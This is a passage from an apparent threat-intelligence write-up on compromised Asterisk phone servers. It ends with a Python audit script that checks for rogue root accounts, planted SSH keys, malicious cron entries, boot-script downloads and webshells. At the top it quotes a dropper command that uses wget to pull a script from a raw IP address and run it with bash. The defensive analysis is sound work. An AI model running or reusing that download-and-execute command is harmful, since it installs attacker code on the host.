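(setsid wget "http://45.234.176.202/new/k.php" -O /var/spool/asterisk/tmp/serv && bash /var/spool/asterisk/tmp/serv) &
"""


def rogue_root_accounts(passwd_text: str) -> list[str]:
    """uid 0 accounts other than root; any such name is a finding."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            rogue.append(fields[0])
    return rogue


def rogue_ssh_keys(authorized_keys_text: str, comment: str = PLANTED_KEY_COMMENT) -> list[str]:
    """Key lines whose trailing comment equals the planted key's label."""
    return [line for line in authorized_keys_text.splitlines()
            if len(line.split()) >= 3 and line.split()[-1] == comment]


def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Non-comment crontab lines carrying any of the report's cron markers."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and any(marker in line for marker in CRON_MARKERS)]


def external_fetches(script_text: str) -> list[str]:
    """IPv4 addresses that wget/curl fetch from in a login or boot script."""
    return EXTERNAL_FETCH.findall(script_text)


def present_webshell_paths(web_root: Path) -> list[str]:
    """Which of the report's deployment paths exist under web_root."""
    return [rel for rel in WEBSHELL_PATHS if (web_root / rel).exists()]


def audit(passwd: str, auth_keys: str, crontab: str, boot_scripts: str, web_root: Path) -> dict:
    """One summary dict; every non-empty value is an indicator worth escalating."""
    rogue = rogue_root_accounts(passwd)
    return {
        "uid0_accounts": rogue,
        "known_actor_names": sorted(set(rogue) & BACKDOOR_NAMES),
        "planted_keys": rogue_ssh_keys(auth_keys),
        "cron": suspicious_cron_lines(crontab),
        "boot_fetch_ips": external_fetches(boot_scripts),
        "webshells": present_webshell_paths(web_root),
    }


def build_sample_web_root() -> Path:
    """Constructed web root containing a single planted ajax.php."""
    root = Path(tempfile.mkdtemp(prefix="pbx-audit-"))
    (root / "admin/views").mkdir(parents=True)
    (root / "admin/views/ajax.php").write_text("<?php /* constructed stand-in */ ?>\n")
    return root


if __name__ == "__main__":
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_AUTH_KEYS, SAMPLE_CRONTAB,
                            SAMPLE_RC_LOCAL, build_sample_web_root()).items():
        print(f"{key}: {value}")
```

On a real host, feed `audit` the contents of `/etc/passwd`, every `authorized_keys` file, `crontab -l` output for root and asterisk plus `/etc/cron.d`, the concatenated `.bash_profile`, `.bashrc` and `/etc/rc.local`, and `Path("/var/www/html")`. Because the per-minute cron re-fetches the dropper, treat any single non-empty finding as full compromise rather than cleaning the one artifact you found.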
Analysis: GHOST automated threat intelligence | Breakglass Intelligence 17 samples analyzed | Investigation IDs: k-4e3ae67c (primary), k-9aab8930, k-c424cef8, k-4dd9d995, k-8821b181, k-3b4c85d2, and 11 additional variants